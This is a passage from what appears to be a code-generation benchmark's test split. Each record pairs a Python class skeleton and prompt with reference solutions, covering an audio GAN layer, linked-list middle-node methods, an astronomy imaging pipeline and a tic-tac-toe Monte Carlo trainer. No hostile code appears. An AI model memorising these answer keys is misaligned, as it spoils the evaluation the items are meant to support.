__init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n <|body_0|>\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n<|end_body_0|>\n\n<|body_start_1|>\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n<|end_body_1|>\n", "revision_id": "c68b4590ab20eaf55e0b96b82325a90177fffd5c", "skeleton": "<|skeleton|>\nclass TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n <|body_0|>\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TADELayer:\n \"\"\"TADE Layer module.\"\"\"\n\n def __init__(self, in_channels=64, aux_channels=80, kernel_size=9, bias=True, upsample_factor=2, upsample_mode='nearest'):\n \"\"\"Initilize TADE layer.\"\"\"\n super().__init__()\n self.norm = torch.nn.InstanceNorm1d(in_channels)\n self.aux_conv = torch.nn.Sequential(torch.nn.Conv1d(aux_channels, in_channels, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.gated_conv = torch.nn.Sequential(torch.nn.Conv1d(in_channels, in_channels * 2, kernel_size, 1, bias=bias, padding=(kernel_size - 1) // 2))\n self.upsample = torch.nn.Upsample(scale_factor=upsample_factor, mode=upsample_mode)\n\n def forward(self, x, c):\n \"\"\"Calculate forward propagation. Args: x (Tensor): Input tensor (B, in_channels, T). c (Tensor): Auxiliary input tensor (B, aux_channels, T'). Returns: Tensor: Output tensor (B, in_channels, T * in_upsample_factor). Tensor: Upsampled aux tensor (B, in_channels, T * aux_upsample_factor).\"\"\"\n x = self.norm(x)\n c = self.upsample(c)\n c = self.aux_conv(c)\n cg = self.gated_conv(c)\n cg1, cg2 = cg.split(cg.size(1) // 2, dim=1)\n y = cg1 * self.upsample(x) + cg2\n return (y, c)\n", "source": "the_stack_v2_python_sparse", "source_path": "parallel_wavegan/layers/tade_res_block.py", "source_repo": "kan-bayashi/ParallelWaveGAN", "split": "test", "star_events_count": 1405} {"blob_id": "c55368d7f7f25a9f08c079abd77c5f4db0d74b50", "bodies": ["array = [head]\nwhile array[-1].next:\n array.append(array[-1].next)\nreturn array[len(array) // 2]", "n, cur = (0, head)\nwhile cur:\n n += 1\n cur = cur.next\nk, cur = (0, head)\nwhile k < n // 2:\n k += 1\n cur = cur.next\nreturn cur", "fast = slow = head\nwhile fast and fast.next:\n slow = slow.next\n fast = fast.next.next\nreturn slow"], "bodies_text": "<|body_start_0|>\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n<|end_body_0|>\n\n<|body_start_1|>\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n<|end_body_1|>\n\n<|body_start_2|>\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n <|body_0|>\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n <|body_1|>\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n \"\"\"快慢指针\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n<|end_body_0|>\n\n<|body_start_1|>\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n<|end_body_1|>\n\n<|body_start_2|>\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000220", "length_bytes": 1920, "license_type": "no_license", "methods": [{"docstring": "数组", "name": "middle_node", "signature": "def middle_node(cls, head: ListNode) -> ListNode"}, {"docstring": "单指针", "name": "middle_node_v2", "signature": "def middle_node_v2(cls, head: ListNode) -> ListNode"}, {"docstring": "快慢指针", "name": "middle_node_v3", "signature": "def middle_node_v3(cls, head: ListNode) -> ListNode"}], "n_methods": 3, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def middle_node(cls, head: ListNode) -> ListNode: 数组\n- def middle_node_v2(cls, head: ListNode) -> ListNode: 单指针\n- def middle_node_v3(cls, head: ListNode) -> ListNode: 快慢指针", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def middle_node(cls, head: ListNode) -> ListNode: 数组\n- def middle_node_v2(cls, head: ListNode) -> ListNode: 单指针\n- def middle_node_v3(cls, head: ListNode) -> ListNode: 快慢指针\n\n<|skeleton|>\nclass Solution:\n\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n <|body_0|>\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n <|body_1|>\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n \"\"\"快慢指针\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n<|end_body_0|>\n\n<|body_start_1|>\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n<|end_body_1|>\n\n<|body_start_2|>\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n<|end_body_2|>\n", "revision_id": "1d1876620a55ff88af7bc390cf1a4fd4350d8d16", "skeleton": "<|skeleton|>\nclass Solution:\n\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n <|body_0|>\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n <|body_1|>\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n \"\"\"快慢指针\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def middle_node(cls, head: ListNode) -> ListNode:\n \"\"\"数组\"\"\"\n array = [head]\n while array[-1].next:\n array.append(array[-1].next)\n return array[len(array) // 2]\n\n def middle_node_v2(cls, head: ListNode) -> ListNode:\n \"\"\"单指针\"\"\"\n n, cur = (0, head)\n while cur:\n n += 1\n cur = cur.next\n k, cur = (0, head)\n while k < n // 2:\n k += 1\n cur = cur.next\n return cur\n\n def middle_node_v3(cls, head: ListNode) -> ListNode:\n \"\"\"快慢指针\"\"\"\n fast = slow = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n return slow\n", "source": "the_stack_v2_python_sparse", "source_path": "01-数据结构/链表/876.链表的中间结点.py", "source_repo": "jh-lau/leetcode_in_python", "split": "test", "star_events_count": 0} {"blob_id": "685fd25e3f51e11e3e834eb4a3367c6abae58635", "bodies": ["if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\nelse:\n fname_end = ''\nself.mol = mol\nself.path = './data/' + mol + '/' + mol + fname_end\nself.uvf = fits.open(self.path + '.uvf')\nself.fits = fits.open(self.path + '.fits')\nself.baseline_cutoff = 110\nself.rms = lines[mol]['rms']\nself.restfreq = lines[mol]['restfreq']\n\"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"", "sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\nsp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\nsp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\nsp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\nsp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\nif show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])"], "bodies_text": "<|body_start_0|>\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"\n<|end_body_0|>\n\n<|body_start_1|>\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n<|end_body_1|>\n", "class_docstring": "Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.", "class_name": "Observation", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n <|body_0|>\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"\n<|end_body_0|>\n\n<|body_start_1|>\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000221", "length_bytes": 26328, "license_type": "no_license", "methods": [{"docstring": "Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation", "name": "__init__", "signature": "def __init__(self, mol, cut_baselines=True)"}, {"docstring": "Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()", "name": "clean", "signature": "def clean(self, show=True)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001698", "prompt": "Implement the Python class `Observation` described below.\n\nClass description:\nMake the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\n\nMethod signatures and docstrings:\n- def __init__(self, mol, cut_baselines=True): Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\n- def clean(self, show=True): Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()", "prompted_full_text": "Implement the Python class `Observation` described below.\n\nClass description:\nMake the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\n\nMethod signatures and docstrings:\n- def __init__(self, mol, cut_baselines=True): Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\n- def clean(self, show=True): Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\n\n<|skeleton|>\nclass Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n <|body_0|>\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"\n<|end_body_0|>\n\n<|body_start_1|>\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n<|end_body_1|>\n", "revision_id": "f333f97a3d6f913037fa94b4b17ad1f2e5621b05", "skeleton": "<|skeleton|>\nclass Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n <|body_0|>\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Observation:\n \"\"\"Make the whole observation/data processing shindig a Class. This incorporates everything from the path to the original data file to the final model. Running it will grab the appropriate data files and spit out a cleaned image and some other stuff. Only used in analysis.py/MCMC_Analysis I think? Probably doesn't do too much important stuff.\"\"\"\n\n def __init__(self, mol, cut_baselines=True):\n \"\"\"Give some init values. Args: root (str): the name of the directory to source the data files from name (str): the name of the data files to grab from root rms (float): the rms noise of that particular observation\"\"\"\n if cut_baselines:\n fname_end = '-short' + str(lines[mol]['baseline_cutoff'])\n else:\n fname_end = ''\n self.mol = mol\n self.path = './data/' + mol + '/' + mol + fname_end\n self.uvf = fits.open(self.path + '.uvf')\n self.fits = fits.open(self.path + '.fits')\n self.baseline_cutoff = 110\n self.rms = lines[mol]['rms']\n self.restfreq = lines[mol]['restfreq']\n \"\\n Not convinced about this stuff. It's not working for my files.\\n try:\\n self.dec = self.uvf[0].data['OBSDEC'][0]\\n self.ra = self.uvf[0].data['OBSRA'][0]\\n except:\\n self.dec = self.uvf[3].data['DECEPO'][0]\\n self.ra = self.uvf[3].data['RAEPO'][0]\\n\\n # Keep digging for these guys. They're probably somewhere.\\n \"\n\n def clean(self, show=True):\n \"\"\"Clean and image (if desired) some data. Note that this is pulled directly from iorek/jonas/.../tools.py/icr()\"\"\"\n sp.call('rm -rf {}.{{mp,bm,cl,cm}}'.format(self.path), shell=True)\n sp.call(['puthd', 'in={}.vis/restfreq'.format(self.path), 'value={}'.format(self.restfreq)])\n sp.call(['invert', 'vis={}.vis'.format(self.path), 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'options=systemp', 'select=-uvrange(0,{})'.format(self.baseline_cutoff), 'cell=0.045', 'imsize=256', 'robust=2'])\n sp.call(['clean', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'out={}.cl'.format(self.path), 'niters=10000', 'threshold=1e-3'])\n sp.call(['restor', 'map={}.mp'.format(self.path), 'beam={}.bm'.format(self.path), 'model={}.cl'.format(self.path), 'out={}.cm'.format(self.path)])\n if show:\n sp.call(['cgdisp', 'in=cgdisp_start.im', 'type=p', 'device=/xs'])\n imstat_out = sp.check_output(['imstat', 'in={}.cm'.format(self.path), \"region='boxes(256,0,512,200)'\"])\n clean_rms = float(imstat_out[-38:-29])\n print('Clean rms is {}'.format(clean_rms))\n sp.call(['cgdisp', 'in={}.cm,{}.cm'.format(self.path, self.path), 'type=p,c', 'device=/xs', 'slev=a,{}'.format(clean_rms), 'levs1=-6,-4,-2,2,4,6', 'region=arcsec,box(-5,-5,5,5)', 'labtyp=arcsec', 'beamtyp=b,l,3'])\n", "source": "the_stack_v2_python_sparse", "source_path": "utils.py", "source_repo": "Jonasori/Proplyd-Modeling", "split": "test", "star_events_count": 2} {"blob_id": "2c160e3d78b731a3acb332ccdd3af099038d4c85", "bodies": ["if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\nself.path = path\nself.i_epoch = 0\nself.policy_1 = TabularPolicy()", "self.policy_2 = TabularPolicy()\nreturns = dict()\nfor num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\nfor _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\nfor num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\nself.i_epoch += 1\npickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\nprint('MC prediction finished.')"], "bodies_text": "<|body_start_0|>\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n<|end_body_1|>\n", "class_docstring": "", "class_name": "TrainOneRound", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TrainOneRound:\n\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n <|body_0|>\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if read_first:\n self.policy_1, self.i_epoch = pickle.load(open(path, 'rb'))\n print('Policy read from file. Trained for %i epochs.' % self.i_epoch)\n self.path = path\n self.i_epoch = 0\n self.policy_1 = TabularPolicy()\n<|end_body_0|>\n\n<|body_start_1|>\n self.policy_2 = TabularPolicy()\n returns = dict()\n for num in range(int('1' + '0' * 9, 3), int('2' * 10, 3) + 1):\n returns[num] = []\n for _ in range(n_epoch):\n s = State().get_num()\n history = [s]\n while not State(from_base10=s).is_terminal():\n s = self.policy_1.move_dict[s]\n history.append(s)\n if State(from_base10=s).is_terminal():\n break\n s = self.policy_2.move_dict[s]\n history.append(s)\n g = State(from_base10=s).get_reward()\n for i, s in enumerate(history):\n returns[s].append(g)\n if i % 2 == 0:\n self.policy_1.v_dict[s] = np.average(returns[s])\n else:\n self.policy_2.v_dict[s] = np.average(returns[s])\n for num in range(int('2' + '0' * 9, 3), int('2' * 10, 3) + 1):\n self.policy_1.v_dict[num] = self.policy_2.v_dict[num]\n self.i_epoch += 1\n pickle.dump((self.policy_1, self.i_epoch), open(self.path, 'wb'))\n print('MC prediction finished.')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000222", "length_bytes": 2243, "license_type": "no_license", "methods": [{"docstring": "Input: path: the path to save the policy read_first: if true, read from the path first", "name": "__init__", "signature": "def __init__(self, path, read_first=False)"}, {"docstring": "MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained", "name": "MCPrediction", "signature": "def MCPrediction(self, n_epoch)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003950", "prompt": "Implement the Python class `TrainOneRound` described below.\n\nClass description:\nImplement the TrainOneRound class.\n\nMethod signatures and docstrings:\n- def __init__(self, path, read_first=False): Input: path: the path to save the policy read_first: if true, read from the path first\n- def MCPrediction(self, n_epoch): MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained", "prompted_full_text": "Implement the Python class `TrainOneRound` described below.\n\nClass description:\nImplement the TrainOneRound class.\n\nMethod signatures and docstrings:\n- def __init__(self, path, read_first=False): Input: path: the path to save the policy read_first: if true, read from the path first\n- def MCPrediction(self, n_epoch): MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\n\n<|skeleton|>\nclass TrainOneRound:\n\n def __init__(self, path, read_first=False):\n \"\"\"Input: path: the path to save the policy read_first: if true, read from the path first\"\"\"\n <|body_0|>\n\n def MCPrediction(self, n_epoch):\n \"\"\"MC prediction following Sutton Barto 5.1 Against rush opponent Input: n_epoch: the number of episodes to be trained\"\"\"\n 